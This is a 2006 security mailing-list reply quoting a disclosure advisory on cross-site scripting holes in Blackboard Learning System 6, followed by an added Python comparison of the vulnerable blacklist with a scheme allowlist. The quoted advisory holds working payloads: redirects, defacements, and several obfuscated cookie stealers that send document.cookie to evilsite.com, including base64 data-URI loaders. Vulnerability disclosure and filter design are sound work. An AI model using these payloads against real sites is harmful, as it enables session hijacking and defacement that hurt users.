Re: BlackBoard Multiple Vulnerabilities (XSS)
- To: Pr070n@xxxxxxxxx
- Subject: Re: BlackBoard Multiple Vulnerabilities (XSS)
- From: "C. Hamby" <fixer@xxxxxxx>
- Date: Tue, 22 Aug 2006 16:57:40 -0800
What type of an account do you have to have and in what sections can
this be exploited?
Also, has Blackboard verified this in their current release (7.1)?
-cdh
Pr070n@xxxxxxxxx wrote:
> -----------------------------------------------------------------------------------------
>
>
> Found by: PrOtOn & digi7al64
>
>
> Date: May 20th 2006
>
>
> Critical Level: High
>
>
> Type: Multiple Cross Site Scripting (XSS) vulnerabilities
>
>
>
> ------------------------------------------------------------------------------------------
>
>
>
> Software:
>
> Blackboard Learning System (Release 6) Blackboard Learning and Community
> Portal Suite (Release6)-6.2.3.23
>
>
>
> ------------------------------------------------------------------------------------------
>
>
>
> Explanation: You can inject HTML, VB code and/or Javascript into specific tags to steal cookies, deface the site using frame busters or even redirect to external sites for phishing purposes.
>
> If you have limited access, then a simple post into the Discussion Board using the right tags with the right code (provided below) will execute the vulnerability(ies).
>
>
>
> -------------------------------------------------------------------------------------------
>
>
> About:
>
> Blackboard's parsing system only checks for the string "javascript", thus
> vbscript code can be injected at will into tags as well as any versions of
> javascript that use uncommon syntax (i.e. tabs, encoding, etc.)
>
>
> -------------------------------------------------------------------------------------------
>
> Vulnerabilities:
>
>
> Defacement (FrameBuster)
>
> -------------------------
>
> <meta http-equiv="refresh"
>
> content="15;url= http://evilsite.com">
>
>
>
> Defacement (FrameBuster)
>
> -------------------------
>
> <iframe src=" http://evilsite.com" width=100
>
> height=100></iframe>
>
>
>
> Defacement (IE ONLY)
>
> -------------------------
>
> <img src=vbscript:document.write("defaced_by_insane_script_kiddies")>
>
>
>
> Defacement (IE ONLY)
>
> -------------------------
>
> <link rel="stylesheet"
>
> href=vbscript:document.write("defaced_by_insane_script_kiddies")>
>
>
> <img src=vb script:document.write("defaced_by_insane_script_kiddies")>
>
>
>
> Cookie Stealer (IE ONLY)
>
> -------------------------
>
>
> <img
>
> src="vbscript:wintest=window.open(%22http://evilsite.com +
> document.cookie)"style=visibility:hidden/>
>
> <img src="vbscript:window.focus ()"style=visibility:hidden/>
>
> <img src="vbscript: window.close()"style=visibility:hidden/>
>
>
>
> Cookie Stealer (IE ONLY)
>
> -------------------------
>
> <link rel="stylesheet"
>
> href="vbscript:wintest=window.open(%22http://evilsite.com+document.cookie)">
>
>
>
> Cookie Stealer (Encoded Tab - IE ONLY)
>
> -------------------------
>
> <img
>
> src="jav	ascript:
> document.images[1].src=%22http://evilsite.com+document.cookie;"<img src="jav
>
> ascript:document.images[1].src=%22http://evilsite.com+document.cookie;"style=visibility:hidden/>
>
>
>
> Cookie Stealer (html encoded - IE ONLY)
>
> -------------------------
>
> <img
>
> src='javascripdocument.images[1].s
>
> rc=" http://evilsite.com"+document.cookie;'<img
>
> src="jav
>
> ascript:document.images[1].src=%22http://evilsite.com+document.cookie;"style=visibility:hidden/>
>
>
>
> Cookie Stealer (tabs - IE ONLY)
>
> -------------------------
>
> <img src="jav
>
> ascript:document.images[1].src=%22http://evilsite.com+document.cookie;"style=visibility:hidden/>
>
>
>
> Cookie Stealer (body tag with tabs - IE ONLY)
>
> -------------------------
>
> <body background="jav
>
> ascript:document.images[1].src=%22http://evilsite.com+document.cookie;">
>
>
>
> Cookie Stealer (div tag with tabs - IE ONLY)
>
> -------------------------
>
> <div style="background-image: url(jav
>
> ascript:document.images[1].src=%22http://evilsite.com+document.cookie;)">
>
>
>
> Cookie Stealer (firefox)
>
> -------------------------
>
> <META HTTP-EQUIV="refresh"
>
> CONTENT="0;url=data:text/html;base64,PHNjcmlwdCBzcmM9Imh0dHA6Ly9ldmlsc2l0ZS5jb20vY29va2llLmpzIj48L3NjcmlwdD4=">
>
>
>
> Cookie Stealer (firefox - click to work)
>
> -------------------------
>
> <a
>
> href="data:text/html;base64,PHNjcmlwdCBzcmM9Imh0dHA6Ly9ldmlsc2l0ZS5jb20vY29va2llLmpzIj48L3NjcmlwdD4=">hmmm</a>
>
>
>
>
> ---------------------------------------------------------------------------------------------
>
>
>
> Disclaimer:
>
> Myself or any other person involved with this discovery will not be responsible for what you do with this information.
>
> Blackboard developers have been contacted by me and a patch has been released according to them.
>
>
>
> -----------------------------------------------------------------------------------------------
>
>
>
> Shout Outs:
>
> r0xes, criticalsecurity(dot)net, Infowar(dot)com
>
>
>
> ------------------------------------------------------------------------------------------------
>
>
>
> Contact:
>
> Pr070n(at)gmail(dot)com
>
> Digi7al64(at)gmail(dot)com
>
>
>
> -------------------------------------------------------------------------------------------------
>
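
The filtering weakness described in the quoted advisory's "About" section, as an added example that is not part of the original thread and not Blackboard's code: a check that only looks for the string "javascript" is compared with a scheme allowlist applied after entity decoding and control-character stripping. The function names, the allowed scheme set and the sample values are assumptions constructed for illustration; the check covers URL-valued attributes only, not style attributes or meta refresh content.

```python
import html
import re

# Assumption: the only URL schemes a discussion-board post needs.
ALLOWED_SCHEMES = {"http", "https", "mailto"}

# C0 controls, space and DEL: characters a lenient browser parser may
# drop from a URL, which lets "jav<TAB>ascript:" resolve as "javascript:".
_IGNORED = re.compile(r"[\x00-\x20\x7f]")
_SCHEME = re.compile(r"([A-Za-z][A-Za-z0-9+.\-]*):")


def naive_filter_allows(value: str) -> bool:
    """Blacklist as described in the advisory: reject the literal string only."""
    return "javascript" not in value.lower()


def scheme_allowlisted(value: str) -> bool:
    """Accept a URL attribute value only if its scheme is on the allowlist."""
    decoded = html.unescape(value)       # resolve &#9; and similar first
    cleaned = _IGNORED.sub("", decoded)  # then drop tabs, newlines, spaces
    match = _SCHEME.match(cleaned)
    if match is None:
        return True                      # no scheme: relative URL
    return match.group(1).lower() in ALLOWED_SCHEMES


# Constructed sample attribute values with harmless bodies.
SAMPLES = [
    "http://example.edu/notes.html",
    "/courses/101/forum",
    "javascript:void(0)",
    "vbscript:x",
    "jav\tascript:void(0)",
    "jav&#9;ascript:void(0)",
    "data:text/html;base64,AAAA",
]


def compare(samples):
    """Return (value, naive verdict, allowlist verdict) for each sample."""
    return [(s, naive_filter_allows(s), scheme_allowlisted(s)) for s in samples]


if __name__ == "__main__":
    for value, naive, strict in compare(SAMPLES):
        print(f"{value!r:40} naive={naive!s:5} allowlist={strict}")
```
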